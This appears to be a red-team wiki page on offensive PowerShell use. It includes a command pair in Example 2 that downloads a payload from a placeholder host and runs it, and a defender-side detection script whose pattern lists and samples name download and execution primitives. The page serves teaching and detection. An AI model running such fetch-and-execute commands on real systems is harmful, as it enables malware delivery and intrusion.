# Offensive PowerShell

**PowerShell** is a powerful scripting language and command-line shell used predominantly by system administrators for automation and configuration management. However, its capabilities make it a valuable tool for red teamers to conduct penetration testing, exploit vulnerabilities, and maintain persistence within a target environment.

### Why PowerShell is Useful for Red Teaming

**Pre-installed and Trusted**: PowerShell is natively installed on Windows operating systems, and its legitimate use by administrators makes it less likely to raise immediate suspicion during red teaming activities.

**Automation and Scripting**: The ability to automate complex tasks with simple scripts makes PowerShell an ideal choice for red teamers. Tasks such as reconnaissance, exploitation, and post-exploitation activities can be scripted to save time and reduce manual effort.

**Integration with .NET**: PowerShell’s integration with the .NET framework allows red teamers to leverage a vast library of functions and classes, expanding the scope of their capabilities.

**Remoting Capabilities**: PowerShell remoting enables red teamers to execute commands on remote systems, making lateral movement within a network more efficient.

**Living-off-the-Land (LotL) Techniques**: Using PowerShell, red teamers can leverage existing tools and scripts within the target environment to achieve their objectives, minimizing the need to introduce new, potentially detectable software.

### Examples and Usage

**Example 1: Gathering System Information**

This command gathers detailed information about the computer, including hardware, operating system, and network configuration.

```powershell
Get-ComputerInfo
```

**Example 2: Downloading and Executing a Payload**

This script downloads a payload from a specified URL and executes it.

```powershell
Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile C:\Temp\payload.exe
Start-Process -FilePath C:\Temp\payload.exe
```
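The download-then-execute sequence in Example 2 is also what a defender looks for in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The block below is an added, defender-side example and is not code from the original page or from the linked collection: it checks whether Script Block Logging is enabled, scans script block text for a download primitive and an execution primitive appearing together, and runs that test over constructed sample blocks and, where logging is on, over the live event log. The function names, the pattern lists and the sample strings are this example's own choices, not an official indicator set.

```powershell
# Added defender-side example; not from the original page.
# 1. Check the Script Block Logging prerequisite.
# 2. Flag script blocks that pair a download primitive with an execution
#    primitive, the shape of Example 2 above.

# Policy value behind "Turn on PowerShell Script Block Logging".
$SblPolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Test-ScriptBlockLogging {
    # $true when EnableScriptBlockLogging is set to 1 under the policy key.
    $v = Get-ItemProperty -Path $SblPolicyPath -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.EnableScriptBlockLogging -eq 1)
}

# Pattern lists are this example's own; aliases are included because logged
# script text keeps whatever spelling the operator typed.
$DownloadPatterns = @('Invoke-WebRequest', '\biwr\b', '\bwget\b', '\bcurl\b',
                      'Net\.WebClient', 'DownloadFile|DownloadString', 'Start-BitsTransfer')
$ExecutePatterns  = @('Start-Process', '\bsaps\b', 'Invoke-Expression', '\biex\b',
                      '\[Reflection\.Assembly\]::Load')

function Test-DownloadExecute {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)
    $dl = @($DownloadPatterns | Where-Object { $ScriptBlockText -match $_ })
    $ex = @($ExecutePatterns  | Where-Object { $ScriptBlockText -match $_ })
    [pscustomobject]@{
        Suspicious = ($dl.Count -gt 0 -and $ex.Count -gt 0)
        Download   = $dl -join ','
        Execute    = $ex -join ','
        Text       = $ScriptBlockText
    }
}

function Get-ScriptBlockEvents {
    # Reads Event ID 4104 from the live log; the script text sits in the
    # EventData field named ScriptBlockText, the source file (if any) in Path.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        $data = ([xml]$_.ToXml()).Event.EventData.Data
        [pscustomobject]@{
            TimeCreated = $_.TimeCreated
            Path        = ($data | Where-Object Name -eq 'Path').'#text'
            Text        = ($data | Where-Object Name -eq 'ScriptBlockText').'#text'
        }
    }
}

# Constructed sample script blocks standing in for logged events, so the logic
# runs on a host where 4104 logging is off. The first two should flag, the
# last two (Example 1, and a download with no execution) should not.
$Samples = @(
    'Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile C:\Temp\payload.exe; Start-Process -FilePath C:\Temp\payload.exe',
    'iwr http://example.com/payload.exe -OutFile C:\Temp\p.exe; saps C:\Temp\p.exe',
    'Get-ComputerInfo',
    'Invoke-WebRequest -Uri http://example.com/report.csv -OutFile C:\Temp\report.csv'
)

"Script Block Logging enabled: $(Test-ScriptBlockLogging)"
$Samples | ForEach-Object { Test-DownloadExecute -ScriptBlockText $_ } |
    Format-Table Suspicious, Download, Execute, Text -AutoSize -Wrap

# Same test over the live log when logging is available.
if (Test-ScriptBlockLogging) {
    Get-ScriptBlockEvents | ForEach-Object { Test-DownloadExecute -ScriptBlockText $_.Text } |
        Where-Object Suspicious | Format-Table TimeCreated, Text -Wrap
}
```

The check is deliberately narrow: it only flags a block that contains both halves of the pattern, so a plain `Invoke-WebRequest` used to fetch a report is not reported. Without Script Block Logging there is nothing to scan, which is why the prerequisite check comes first.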

#### A useful collection of offensive PowerShell scripts:

{% embed url="https://github.com/sartlabs/OffensiveTools/tree/main/Offensive_Powershell" %}

{% hint style="info" %}
The collection is updated on a regular basis!
{% endhint %}
